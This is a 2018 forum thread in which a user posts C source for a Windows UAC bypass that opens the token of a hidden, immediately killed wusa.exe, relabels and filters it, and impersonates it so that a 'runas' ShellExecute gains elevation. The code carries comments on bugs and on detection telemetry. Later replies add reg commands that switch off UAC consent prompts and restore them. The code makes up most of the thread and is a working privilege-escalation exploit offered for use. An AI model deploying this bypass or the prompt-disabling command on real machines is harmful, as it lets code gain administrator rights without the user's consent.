
0xall0c 03-17-2018 21:13

Uac bypass implementation
 
This is an implementation of a UAC bypass method (authors: CIA & James Forshaw).
It works from Windows 7 up to the latest Windows 10 Fall Creators Update.

Code:

/*
 * StepOverUAC - obtain a token from a hidden wusa.exe instance, relabel it to
 * medium integrity, filter it, and make the calling thread impersonate it.
 *
 * Sequence visible below: two inheritable anonymous pipes are created (their
 * handle variables are not declared in this function and are unused
 * afterwards), three ntdll exports are resolved at run time, wusa.exe is
 * started hidden via ShellExecuteEx and its token opened with MAXIMUM_ALLOWED
 * before the process is killed, the token is duplicated as a primary token,
 * its integrity label is set to SECURITY_MANDATORY_MEDIUM_RID, NtFilterToken
 * is applied with flag 0x4, and the result is passed to
 * ImpersonateLoggedOnUser.  Per the post, a ShellExecute with the "runas"
 * verb is then issued from the impersonating thread.
 *
 * Returns 0 on any failure.  There is no return statement on the success
 * path, so the value a caller sees after ImpersonateLoggedOnUser succeeds is
 * undefined.  None of the handles (the pipes, hProcessToken, hNewToken,
 * filterToken, shinfo.hProcess) nor pIntegritySid is released on any path.
 *
 * Defender's view: the observable chain is a short-lived, hidden wusa.exe
 * whose token is opened by a non-elevated process and which is terminated
 * immediately afterwards, followed by thread impersonation and an elevated
 * child.  Process-creation, token-duplication and impersonation telemetry on
 * that sequence is the detection point; the follow-up reply in this thread
 * notes that later Windows 10 builds changed the UAC behaviour this relies
 * on, so the technique is version-dependent.
 */
int StepOverUAC()
{
        SECURITY_ATTRIBUTES sa;
        sa.nLength = sizeof(SECURITY_ATTRIBUTES);
        sa.bInheritHandle = TRUE;               // pipe handles are inheritable
        sa.lpSecurityDescriptor = NULL;

        // inRead/inWrite/outRead/outWrite are not declared here (presumably
        // file-scope globals); the pipes are never used or closed below.
        if (!CreatePipe(&inRead, &inWrite, &sa, 0))
                return 0;
        if (!CreatePipe(&outRead, &outWrite, &sa, 0))
                return 0;
        // Native token APIs resolved dynamically from ntdll.  The function
        // pointer typedefs are outside this listing, and none of the three
        // GetProcAddress results is checked for NULL before use.
        NtSetInformationToken nt = (NtSetInformationToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtSetInformationToken");
        RtlLengthSid rts = (RtlLengthSid)GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlLengthSid");   // unused below
        NtFilterToken filter = (NtFilterToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtFilterToken");
        // Unused in this function: Error, bytesIO, hTest, bCond, sh, ptml,
        // si, si2, pi, pi2, szBuffer.
        DWORD Error, bytesIO;
        NTSTATUS Status;
        HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
        HANDLE filterToken = NULL;
        BOOL bCond = FALSE;
        SHELLEXECUTEINFO shinfo, sh;
        SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
        TOKEN_MANDATORY_LABEL tml, *ptml;
        PSID pIntegritySid = NULL;
        STARTUPINFO si, si2;
        PROCESS_INFORMATION pi, pi2;
        WCHAR szBuffer[MAX_PATH];

        // Launch wusa.exe with no window (SW_HIDE) and keep its process handle
        // (SEE_MASK_NOCLOSEPROCESS) so its token can be opened next.  A hidden
        // wusa.exe that exists only for a few milliseconds is the first
        // host-visible indicator of this sequence.
        RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
        shinfo.cbSize = sizeof(shinfo);
        shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
        shinfo.lpFile = L"wusa.exe";
        shinfo.nShow = SW_HIDE;
        if (!ShellExecuteEx(&shinfo))
                return 0;
        // Open the child's token with every access right the caller can get.
        if (!OpenProcessToken(shinfo.hProcess, MAXIMUM_ALLOWED, &hProcessToken))
                return 0;
        // Kill the child as soon as its token is in hand; -1 passed as the
        // DWORD timeout converts to 0xFFFFFFFF, i.e. INFINITE.
        TerminateProcess(shinfo.hProcess, -1);
        WaitForSingleObject(shinfo.hProcess, -1);
        // Duplicate into a new primary token with TOKEN_ALL_ACCESS.
        if (!DuplicateTokenEx(hProcessToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken))
                return 0;
        // Build the medium mandatory level SID (S-1-16-8192) and relabel the
        // duplicated token to medium integrity.
        if (!AllocateAndInitializeSid(&MLAuthority, 1, SECURITY_MANDATORY_MEDIUM_RID,0, 0, 0, 0, 0, 0, 0, &pIntegritySid))
                return 0;
        tml.Label.Attributes = SE_GROUP_INTEGRITY;
        tml.Label.Sid = pIntegritySid;
        Status = nt(hNewToken, TokenIntegrityLevel, &tml, sizeof(tml));
        if (!NT_SUCCESS(Status))
                return 0;
        // Filter the token; 0x4 corresponds to the LUA_TOKEN flag of the
        // CreateRestrictedToken flag set.  The NTSTATUS is ignored, so
        // filterToken may still be NULL when passed on below.
        filter(hNewToken, 0x4, NULL, NULL, NULL, &filterToken);
        // From here the calling thread runs under the filtered token.  No
        // value is returned on this path (see header comment).
        if (!ImpersonateLoggedOnUser(filterToken))
                return 0;
}

After this, just call ShellExecute with the "runas" verb.

TechLord 03-18-2018 01:29

See this post in our sister forum for the latest developments in UAC bypass, updated just 3 days ago:

Windows 10 Redstone 1/2 UAC changes

0xall0c 03-18-2018 02:43

I had no info about the upcoming release; I will keep using it while it still works ;)

sendersu 03-18-2018 02:59

Even on the very latest, hot-off-the-press W10?

0xall0c 03-19-2018 15:27

there is nothing hot about it :P

niculaita 03-19-2018 15:46

How do I restore UAC to the 1st or 2nd position with an exe or with a reg file?
Sometimes I telework on Windows in other languages, and it is difficult to find UAC and restore it back to normal. Thanks!

0xall0c 03-19-2018 17:17

To turn off UAC completely:

Code:

REM Sets ConsentPromptBehaviorAdmin to 0, the "Elevate without prompting" policy:
REM administrators no longer see any UAC consent dialog. Writing this HKLM policy
REM key itself needs an elevated prompt, and the change weakens UAC for every
REM admin account on the machine, so it should be audited and reverted when done.
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0
To go back to normal:

Code:

REM Restores ConsentPromptBehaviorAdmin to 5, the Windows default
REM ("Prompt for consent for non-Windows binaries"). Needs an elevated prompt.
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 5
Hope this helps.

niculaita 03-20-2018 06:20

in cmd
C:\Users\Nicolae>reg ADD / HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0
ERROR: Invalid key name.
Type "REG ADD /?" for usage.


maybe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /f

and
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t reg_dword /d 5 /f

What is /f for?

0xall0c 03-20-2018 15:45

/f forces the write: if the specified value already exists, it is overwritten without prompting the user.

